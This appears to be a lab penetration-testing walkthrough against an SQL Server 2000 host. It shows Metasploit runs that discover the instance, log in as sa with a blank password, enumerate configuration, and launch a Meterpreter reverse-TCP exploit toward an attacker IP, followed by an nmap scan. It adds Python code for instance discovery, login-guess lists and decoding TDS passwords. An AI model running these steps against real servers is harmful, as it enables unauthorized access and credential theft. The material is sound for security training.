mssql_ping:
msf auxiliary(mssql_ping) > show options
Module options (auxiliary/scanner/mssql/mssql_ping):
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
PASSWORD                              no        The password for the specified username
RHOSTS                                yes       The target address range or CIDR identifier
THREADS              1                yes       The number of concurrent threads
USERNAME             sa               no        The username to authenticate as
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.1.142:
[*] ServerName = ROOT-9743DD32E3
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] Version = 8.00.194
[*] tcp = 1433
[*] np = \\ROOT-9743DD32E3\pipe\sql\query
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
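mssql_ping talks to the SQL Server Browser service on UDP 1434 using the SQL Server Resolution Protocol (MC-SQLR); that is the same port the nmap run at the bottom of this page reports as 1434/udp open|filtered. The reply is a single SVR_RESP datagram: one byte 0x05, a little-endian 16-bit length, then an ASCII string of "key;value;" pairs with ";;" closing each instance, which is exactly the ServerName/InstanceName/IsClustered/Version/tcp/np list printed above. The following is an added example, not the module's own code: it sends the CLNT_UCAST_EX request, parses the reply, and handles several instances and missing keys (an instance with TCP disabled has no "tcp" entry). The sample reply is constructed from the values shown above plus a second, made-up SQLEXPRESS instance. One caveat the page itself illustrates: the Browser service reports 8.00.194 here, while the in-band checks further down (mssql_enum, nmap) report 8.00.2039 (SP4), so use the in-band version when judging patch level.

```python
"""SSRP (MC-SQLR) instance discovery on UDP 1434, as used by mssql_ping."""
import socket
import struct
from typing import Dict, List

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x03"   # ask the Browser service for every instance on the host
SVR_RESP = 0x05           # first byte of the server's reply


def parse_svr_resp(packet: bytes) -> List[Dict[str, str]]:
    """Parse one SVR_RESP datagram into a dict per instance.

    Layout: 0x05, uint16 little-endian RESP_SIZE, then RESP_DATA, an ASCII
    string of "key;value;" pairs where ";;" terminates each instance record.
    """
    if len(packet) < 3 or packet[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP packet")
    (size,) = struct.unpack_from("<H", packet, 1)
    data = packet[3:3 + size]
    if len(data) != size:
        raise ValueError("RESP_SIZE says %d bytes, got %d" % (size, len(data)))
    instances: List[Dict[str, str]] = []
    for record in data.decode("ascii", errors="replace").split(";;"):
        if not record:
            continue
        fields = record.split(";")
        if len(fields) % 2:
            raise ValueError("malformed record: %r" % record)
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def ssrp_ping(host: str, timeout: float = 2.0) -> List[Dict[str, str]]:
    """Send CLNT_UCAST_EX to host:1434 and parse the reply (network call)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        packet, _ = sock.recvfrom(65535)
    return parse_svr_resp(packet)


# Constructed sample reply: the default instance from the mssql_ping output
# above, plus a made-up named instance with TCP disabled (no "tcp" key).
SAMPLE_RESP_DATA = (
    b"ServerName;ROOT-9743DD32E3;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;8.00.194;tcp;1433;np;\\\\ROOT-9743DD32E3\\pipe\\sql\\query;;"
    b"ServerName;ROOT-9743DD32E3;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;9.00.1399.06;np;\\\\ROOT-9743DD32E3\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)
SAMPLE_PACKET = bytes([SVR_RESP]) + struct.pack("<H", len(SAMPLE_RESP_DATA)) + SAMPLE_RESP_DATA


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    found = ssrp_ping(target) if target else parse_svr_resp(SAMPLE_PACKET)
    for inst in found:
        print("%-12s version=%-14s tcp=%s np=%s" % (
            inst.get("InstanceName"), inst.get("Version"),
            inst.get("tcp", "-"), inst.get("np", "-")))
```

Run it with a host argument to query a real Browser service, or without one to parse the constructed sample. Because the Browser service answers unauthenticated UDP, this is the cheapest way to find named instances listening on non-default TCP ports; conversely, blocking 1434/udp at the host firewall removes that discovery path without affecting TDS clients that already know the port.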
mssql_login:
msf auxiliary(mssql_login) > show options
Module options (auxiliary/scanner/mssql/mssql_login):
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
BLANK_PASSWORDS      true             no        Try blank passwords for all users
BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
PASSWORD                              no        A specific password to authenticate with
PASS_FILE                             no        File containing passwords, one per line
RHOSTS                                yes       The target address range or CIDR identifier
RPORT                1433             yes       The target port
STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
THREADS              1                yes       The number of concurrent threads
USERNAME             sa               no        A specific username to authenticate as
USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS         true             no        Try the username as the password for all users
USER_FILE                             no        File containing usernames, one per line
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification
VERBOSE              true             yes       Whether to print output for all attempts
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf auxiliary(mssql_login) > run
[*] 192.168.1.142:1433 - MSSQL - Starting authentication scanner.
[*] 192.168.1.142:1433 MSSQL - [1/2] - Trying username:'sa' with password:''
[+] 192.168.1.142:1433 - MSSQL - successful login 'sa' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
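The counter [1/2] above follows directly from the options: USERNAME=sa with BLANK_PASSWORDS=true, USER_AS_PASS=true and no password file gives exactly two candidates, '' and 'sa', and the first one logs in. Below is an added example (not Metasploit's code) of two things a practitioner wants to understand about such a run: how the candidate list is assembled from those options, and what each attempt puts on the wire. A TDS LOGIN7 packet does not encrypt the password; per MS-TDS it swaps the nibbles of each UTF-16LE byte and XORs with 0xA5, which anyone capturing the session can undo unless the connection negotiates TLS. The candidate ordering (blank, then username-as-password, then the list) is my assumption of the module's behaviour, chosen to match the "[1/2] ... password:''" line above.

```python
"""Candidate ordering for a SQL login guessing run, plus the LOGIN7 password
obfuscation (MS-TDS 2.2.6.4) those attempts carry on the wire."""
from typing import Iterable, List, Tuple


def build_candidates(users: Iterable[str], passwords: Iterable[str],
                     blank_passwords: bool = True,
                     user_as_pass: bool = True) -> List[Tuple[str, str]]:
    """Return ordered, de-duplicated (user, password) pairs to try.

    Assumed order (not taken from the module's source): blank password first,
    then the username itself, then the supplied password list.
    """
    seen = set()
    out: List[Tuple[str, str]] = []
    for user in users:
        guesses: List[str] = []
        if blank_passwords:
            guesses.append("")
        if user_as_pass:
            guesses.append(user)
        guesses.extend(passwords)
        for pw in guesses:
            if (user, pw) not in seen:
                seen.add((user, pw))
                out.append((user, pw))
    return out


def tds7_encode_password(password: str) -> bytes:
    """Obfuscate a LOGIN7 password: UTF-16LE, then per byte swap the two
    nibbles and XOR with 0xA5. Reversible, so it is not confidentiality."""
    raw = password.encode("utf-16-le")
    return bytes((((b & 0x0F) << 4) | (b >> 4)) ^ 0xA5 for b in raw)


def tds7_decode_password(blob: bytes) -> str:
    """Inverse of tds7_encode_password: what a sniffer applies to the password
    field of a captured LOGIN7 when the session is not TLS-protected."""
    raw = bytes(((((b ^ 0xA5) & 0x0F) << 4) | ((b ^ 0xA5) >> 4)) for b in blob)
    return raw.decode("utf-16-le")


if __name__ == "__main__":
    # Same option set as the run above: USERNAME=sa, no PASS_FILE.
    plan = build_candidates(["sa"], [])
    for i, (user, pw) in enumerate(plan, 1):
        print("[%d/%d] user=%r password=%r on the wire=%s" % (
            i, len(plan), user, pw, tds7_encode_password(pw).hex()))
```

Note the blank password encodes to an empty field, so a blank 'sa' login is visible even to a purely passive observer of the TDS stream. Fixes on the server side are the obvious ones the enumeration below confirms are missing: a non-empty sa password (or sa disabled) and TLS required for TDS connections.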
mssql_enum:
msf auxiliary(mssql_enum) > show options
Module options (auxiliary/admin/mssql/mssql_enum):
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
PASSWORD                              no        The password for the specified username
RHOST                                 yes       The target address
RPORT                1433             yes       The target port
USERNAME             sa               no        The username to authenticate as
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification
msf auxiliary(mssql_enum) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Version:
[*] Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
[*] May 3 2005 23:18:38
[*] Copyright (c) 1988-2003 Microsoft Corporation
[*] Enterprise Evaluation Edition on Windows NT 5.1 (Build 2600: Service Pack 3)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Enabled
[*] Ole Automation Procedures is Enabled
[*] Databases on the server:
[*] Database name:master
[*] Database Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf
[*] Database name:tempdb
[*] Database Files for tempdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\templog.ldf
[*] Database name:model
[*] Database Files for model:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\modellog.ldf
[*] Database name:msdb
[*] Database Files for msdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\msdblog.ldf
[*] Database name:pubs
[*] Database Files for pubs:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs_log.ldf
[*] Database name:Northwind
[*] Database Files for Northwind:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.ldf
[*] Database name:fasttrack
[*] Database Files for fasttrack:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\fasttrack_Data.MDF
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\fasttrack_Log.LDF
[*] System Logins on this Server:
[*] sa
[*] BUILTIN\Administrators
[*] System Admin Logins on this Server:
[*] BUILTIN\Administrators
[*] sa
[*] Windows Logins on this Server:
[*] No Windows logins found!
[*] Windows Groups that can logins on this Server:
[*] BUILTIN\Administrators
[*] Accounts with Username and Password being the same:
[*] No Account with its password being the same as its username was found.
[*] Accounts with empty password:
[*] sa
[*] Stored Procedures with Public Execute Permission found:
[*] xp_getfiledetails
[*] xp_dirtree
[*] xp_fixeddrives
[*] xp_getnetname
[*] sp_replsetoriginator
[*] sp_replincrementlsn
[*] xp_enum_activescriptengines
[*] sp_repldone
[*] xp_fileexist
[*] sp_repltrans
[*] xp_ntsec_enumdomains
[*] sp_replcounters
[*] sp_replcmds
[*] sp_replpostschema
[*] sp_replsetsyncstatus
[*] sp_getbindtoken
[*] sp_createorphan
[*] xp_unc_to_drive
[*] sp_droporphans
[*] xp_MSplatform
[*] sp_xml_preparedocument
[*] sp_xml_removedocument
[*] xp_IsNTAdmin
[*] xp_MSnt2000
[*] xp_grantlogin
[*] xp_revokelogin
[*] xp_MSLocalSystem
[*] sp_prepexec
[*] sp_prepexecrpc
[*] sp_unprepare
[*] xp_mergexpusage
[*] xp_showlineage
[*] sp_reset_connection
[*] sp_getschemalock
[*] xp_mapdown_bitmap
[*] sp_releaseschemalock
[*] sp_resyncprepare
[*] sp_resyncexecute
[*] xp_showcolv
[*] sp_resyncexecutesql
[*] sp_resyncuniquetable
[*] sp_refreshview
[*] sp_replsendtoqueue
[*] sp_replwritetovarbin
[*] xp_qv
[*] xp_regread
[*] Instances found on this server:
[*] MSSQLSERVER
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] LocalSystem
[*] Auxiliary module execution completed
mssql_payload:
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > show options
Module options (exploit/windows/mssql/mssql_payload):
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
PASSWORD                              no        The password for the specified username
RHOST                                 yes       The target address
RPORT                1433             yes       The target port
USERNAME             sa               no        The username to authenticate as
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic
msf exploit(mssql_payload) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf exploit(mssql_payload) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on 192.168.1.11:4444
[*] Command Stager progress - 1.47% done (1499/102246 bytes)
[*] Command Stager progress - 2.93% done (2998/102246 bytes)
[*] Command Stager progress - 4.40% done (4497/102246 bytes)
[*] Command Stager progress - 5.86% done (5996/102246 bytes)
[*] Command Stager progress - 7.33% done (7495/102246 bytes)
[*] Command Stager progress - 8.80% done (8994/102246 bytes)
[*] Command Stager progress - 10.26% done (10493/102246 bytes)
[*] Command Stager progress - 11.73% done (11992/102246 bytes)
[*] Command Stager progress - 13.19% done (13491/102246 bytes)
[*] Command Stager progress - 14.66% done (14990/102246 bytes)
[*] Command Stager progress - 16.13% done (16489/102246 bytes)
[*] Command Stager progress - 17.59% done (17988/102246 bytes)
[*] Command Stager progress - 19.06% done (19487/102246 bytes)
[*] Command Stager progress - 20.53% done (20986/102246 bytes)
[*] Command Stager progress - 21.99% done (22485/102246 bytes)
[*] Command Stager progress - 23.46% done (23984/102246 bytes)
[*] Command Stager progress - 24.92% done (25483/102246 bytes)
[*] Command Stager progress - 26.39% done (26982/102246 bytes)
[*] Command Stager progress - 27.86% done (28481/102246 bytes)
[*] Command Stager progress - 29.32% done (29980/102246 bytes)
[*] Command Stager progress - 30.79% done (31479/102246 bytes)
[*] Command Stager progress - 32.25% done (32978/102246 bytes)
[*] Command Stager progress - 33.72% done (34477/102246 bytes)
[*] Command Stager progress - 35.19% done (35976/102246 bytes)
[*] Command Stager progress - 36.65% done (37475/102246 bytes)
[*] Command Stager progress - 38.12% done (38974/102246 bytes)
[*] Command Stager progress - 39.58% done (40473/102246 bytes)
[*] Command Stager progress - 41.05% done (41972/102246 bytes)
[*] Command Stager progress - 42.52% done (43471/102246 bytes)
[*] Command Stager progress - 43.98% done (44970/102246 bytes)
[*] Command Stager progress - 45.45% done (46469/102246 bytes)
[*] Command Stager progress - 46.91% done (47968/102246 bytes)
[*] Command Stager progress - 48.38% done (49467/102246 bytes)
[*] Command Stager progress - 49.85% done (50966/102246 bytes)
[*] Command Stager progress - 51.31% done (52465/102246 bytes)
[*] Command Stager progress - 52.78% done (53964/102246 bytes)
[*] Command Stager progress - 54.24% done (55463/102246 bytes)
[*] Command Stager progress - 55.71% done (56962/102246 bytes)
[*] Command Stager progress - 57.18% done (58461/102246 bytes)
[*] Command Stager progress - 58.64% done (59960/102246 bytes)
[*] Command Stager progress - 60.11% done (61459/102246 bytes)
[*] Command Stager progress - 61.58% done (62958/102246 bytes)
[*] Command Stager progress - 63.04% done (64457/102246 bytes)
[*] Command Stager progress - 64.51% done (65956/102246 bytes)
[*] Command Stager progress - 65.97% done (67455/102246 bytes)
[*] Command Stager progress - 67.44% done (68954/102246 bytes)
[*] Command Stager progress - 68.91% done (70453/102246 bytes)
[*] Command Stager progress - 70.37% done (71952/102246 bytes)
[*] Command Stager progress - 71.84% done (73451/102246 bytes)
[*] Command Stager progress - 73.30% done (74950/102246 bytes)
[*] Command Stager progress - 74.77% done (76449/102246 bytes)
[*] Command Stager progress - 76.24% done (77948/102246 bytes)
[*] Command Stager progress - 77.70% done (79447/102246 bytes)
[*] Command Stager progress - 79.17% done (80946/102246 bytes)
[*] Command Stager progress - 80.63% done (82445/102246 bytes)
[*] Command Stager progress - 82.10% done (83944/102246 bytes)
[*] Command Stager progress - 83.57% done (85443/102246 bytes)
[*] Command Stager progress - 85.03% done (86942/102246 bytes)
[*] Command Stager progress - 86.50% done (88441/102246 bytes)
[*] Command Stager progress - 87.96% done (89940/102246 bytes)
[*] Command Stager progress - 89.43% done (91439/102246 bytes)
[*] Command Stager progress - 90.90% done (92938/102246 bytes)
[*] Command Stager progress - 92.36% done (94437/102246 bytes)
[*] Command Stager progress - 93.83% done (95936/102246 bytes)
[*] Command Stager progress - 95.29% done (97435/102246 bytes)
[*] Command Stager progress - 96.76% done (98934/102246 bytes)
[*] Command Stager progress - 98.19% done (100400/102246 bytes)
[*] Command Stager progress - 99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
nmap:
root@root:~# nmap -sU --script=ms-sql-info 192.168.1.142
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2013-05-14 19:35 EDT
Nmap scan report for 192.168.1.142
Host is up (0.00065s latency).
Not shown: 992 closed ports
PORT      STATE          SERVICE
123/udp   open           ntp
137/udp   open           netbios-ns
138/udp   open|filtered  netbios-dgm
445/udp   open|filtered  microsoft-ds
500/udp   open|filtered  isakmp
1434/udp  open|filtered  ms-sql-m
1900/udp  open|filtered  upnp
4500/udp  open|filtered  nat-t-ike
MAC Address: 00:0C:29:F1:31:D2 (VMware)
Host script results:
| ms-sql-info:
|   Windows server name: ROOT-9743DD32E3
|   [192.168.1.142\MSSQLSERVER]
|     Instance name: MSSQLSERVER
|     Version: Microsoft SQL Server 2000 SP4
|       Version number: 8.00.2039.00
|       Product: Microsoft SQL Server 2000
|       Service pack level: SP4
|       Post-SP patches applied: No
|     TCP port: 1433
|     Named pipe: \\192.168.1.142\pipe\sql\query
|_    Clustered: No
Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds